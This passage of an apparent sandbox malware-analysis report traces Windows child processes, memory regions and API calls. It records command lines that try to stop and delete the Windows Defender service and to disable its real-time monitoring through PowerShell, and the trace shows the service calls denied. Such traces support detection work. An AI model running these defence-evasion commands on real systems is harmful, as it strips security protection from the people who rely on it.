hConsoleHandle=0x7, lpMode=0x4a0b41ac | out: lpMode=0x4a0b41ac) returned 1 [0161.613] _get_osfhandle (_FileHandle=0) returned 0x3 [0161.613] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0b41b0 | out: lpMode=0x4a0b41b0) returned 1 [0161.613] SetConsoleInputExeNameW () returned 0x1 [0161.613] GetConsoleOutputCP () returned 0x1b5 [0161.613] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0b4260 | out: lpCPInfo=0x4a0b4260) returned 1 [0161.613] SetThreadUILanguage (LangId=0x0) returned 0x409 [0161.614] exit (_Code=1) Process: id = "11" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x77ba9000" os_pid = "0x350" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x8a4" cmd_line = "sc stop WinDefend" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1866 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1867 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1868 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1869 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1870 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1871 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1872 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1873 start_va = 0x940000 end_va = 0x94bfff entry_point = 0x940000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 1874 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1875 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1876 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1877 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1878 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1879 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1880 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1881 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1882 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1921 start_va = 0x320000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1922 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1923 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1924 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1925 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1926 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1927 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1928 start_va = 0x470000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1929 start_va = 0x710000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 1930 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1931 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1932 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1933 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1934 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1935 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1936 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1937 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1938 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 1939 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 1940 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1941 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1946 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1947 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1948 start_va = 0x250000 end_va = 0x30ffff entry_point = 0x250000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1949 start_va = 0xf0000 end_va = 0xfffff entry_point = 0xf0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 110 os_tid = 0x6e4 [0120.563] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fe84 | out: lpSystemTimeAsFileTime=0x18fe84*(dwLowDateTime=0xe84f0980, dwHighDateTime=0x1d48db2)) [0120.563] GetCurrentProcessId () returned 0x350 [0120.563] GetCurrentThreadId () returned 0x6e4 [0120.563] GetTickCount () returned 0x2a488 [0120.563] QueryPerformanceCounter (in: lpPerformanceCount=0x18fe7c | out: lpPerformanceCount=0x18fe7c*=1818818600000) returned 1 [0120.563] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0120.563] __set_app_type (_Type=0x1) [0120.563] __p__fmode () returned 0x75ab31f4 [0120.563] __p__commode () returned 0x75ab31fc [0120.563] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x9479c7) returned 0x0 [0120.563] __wgetmainargs (in: _Argc=0x949020, _Argv=0x949028, _Env=0x949024, _DoWildCard=0, _StartInfo=0x949034 | out: _Argc=0x949020, _Argv=0x949028, _Env=0x949024) returned 0 [0120.564] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.578] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.578] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.578] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0120.578] _wcsicmp (_String1="stop", _String2="query") returned 2 [0120.578] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0120.578] _wcsicmp (_String1="stop", _String2="start") returned 14 [0120.578] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0120.578] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0120.578] _wcsicmp (_String1="stop", _String2="control") returned 16 [0120.578] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0120.578] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.578] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x47f960 [0120.662] OpenServiceW (hSCManager=0x47f960, lpServiceName="WinDefend", dwDesiredAccess=0x20) returned 0x0 [0120.662] GetLastError () returned 0x5 [0120.662] _itow (in: _Dest=0x5, _Radix=1637660 | out: _Dest=0x5) returned="5" [0120.662] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x949380, nSize=0x400, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0120.664] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x18fd04, nSize=0x2, Arguments=0x18fd10 | out: lpBuffer="ᰐH\x01") returned 0x33 [0120.667] GetFileType (hFile=0x7) returned 0x2 [0120.668] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18fcd8 | out: lpMode=0x18fcd8) returned 1 [0120.668] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x481c10*, nNumberOfCharsToWrite=0x33, lpNumberOfCharsWritten=0x18fcf4, lpReserved=0x0 | out: lpBuffer=0x481c10*, lpNumberOfCharsWritten=0x18fcf4*=0x33) returned 1 [0120.751] LocalFree (hMem=0x481c10) returned 0x0 [0120.751] LocalFree (hMem=0x0) returned 0x0 [0120.751] CloseServiceHandle (hSCObject=0x47f960) returned 1 [0120.790] exit (_Code=5) Thread: id = 113 os_tid = 0x880 Process: id = "12" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x1d615000" os_pid = "0x410" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x8b0" cmd_line = "sc delete WinDefend" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1883 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1884 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1885 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1886 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1887 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1888 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1889 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1890 start_va = 0x940000 end_va = 0x94bfff entry_point = 0x940000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 1891 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1892 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1893 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1894 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1895 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1896 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1897 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1898 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1899 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1900 start_va = 0x260000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1901 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1902 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1903 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1904 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1905 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1906 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1907 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 1908 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1909 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1910 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1911 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1912 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1913 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1914 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1915 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1916 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1917 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 1918 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 1919 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1920 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1942 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1943 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1944 start_va = 0x490000 end_va = 0x54ffff entry_point = 0x490000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1945 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x130000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 111 os_tid = 0x418 [0120.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f834 | out: lpSystemTimeAsFileTime=0x12f834*(dwLowDateTime=0xe84a46c0, dwHighDateTime=0x1d48db2)) [0120.522] GetCurrentProcessId () returned 0x410 [0120.522] GetCurrentThreadId () returned 0x418 [0120.522] GetTickCount () returned 0x2a469 [0120.522] QueryPerformanceCounter (in: lpPerformanceCount=0x12f82c | out: lpPerformanceCount=0x12f82c*=1818814600000) returned 1 [0120.523] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0120.523] __set_app_type (_Type=0x1) [0120.523] __p__fmode () returned 0x75ab31f4 [0120.523] __p__commode () returned 0x75ab31fc [0120.523] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x9479c7) returned 0x0 [0120.523] __wgetmainargs (in: _Argc=0x949020, _Argv=0x949028, _Env=0x949024, _DoWildCard=0, _StartInfo=0x949034 | out: _Argc=0x949020, _Argv=0x949028, _Env=0x949024) returned 0 [0120.524] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.568] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.568] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.568] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0120.568] _wcsicmp (_String1="delete", _String2="query") returned -13 [0120.568] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0120.568] _wcsicmp (_String1="delete", _String2="start") returned -15 [0120.568] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0120.568] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0120.568] _wcsicmp (_String1="delete", _String2="control") returned 1 [0120.568] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0120.568] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0120.568] _wcsicmp (_String1="delete", _String2="config") returned 1 [0120.568] _wcsicmp (_String1="delete", _String2="description") returned -7 [0120.568] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0120.568] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0120.568] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0120.568] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0120.568] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0120.568] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0120.568] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0120.568] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0120.568] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0120.568] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0120.568] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0120.569] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0120.569] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0120.569] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0120.569] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0120.569] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0120.569] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0120.569] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0120.569] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x39f968 [0120.572] OpenServiceW (hSCManager=0x39f968, lpServiceName="WinDefend", dwDesiredAccess=0x10000) returned 0x0 [0120.572] GetLastError () returned 0x5 [0120.573] _itow (in: _Dest=0x5, _Radix=1242948 | out: _Dest=0x5) returned="5" [0120.573] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x949380, nSize=0x400, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0120.636] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x12f72c, nSize=0x2, Arguments=0x12f738 | out: lpBuffer="ᰘ:༄Z\x03") returned 0x33 [0120.753] GetFileType (hFile=0x7) returned 0x2 [0120.753] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12f700 | out: lpMode=0x12f700) returned 1 [0120.753] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3a1c18*, nNumberOfCharsToWrite=0x33, lpNumberOfCharsWritten=0x12f71c, lpReserved=0x0 | out: lpBuffer=0x3a1c18*, lpNumberOfCharsWritten=0x12f71c*=0x33) returned 1 [0120.754] LocalFree (hMem=0x3a1c18) returned 0x0 [0120.754] LocalFree (hMem=0x0) returned 0x0 [0120.754] CloseServiceHandle (hSCObject=0x39f968) returned 1 [0120.804] exit (_Code=5) Thread: id = 114 os_tid = 0x878 Process: id = "13" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x17415000" os_pid = "0x5a8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x894" cmd_line = "powershell Set-MpPreference -DisableRealtimeMonitoring $true" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1950 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1951 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1952 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1953 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1954 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1955 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1956 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1957 start_va = 0x21fb0000 end_va = 0x22021fff entry_point = 0x21fb0000 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe") Region: id = 1958 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1959 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1960 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1961 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1962 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1963 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1964 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1965 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1966 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1967 start_va = 0x310000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1968 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = 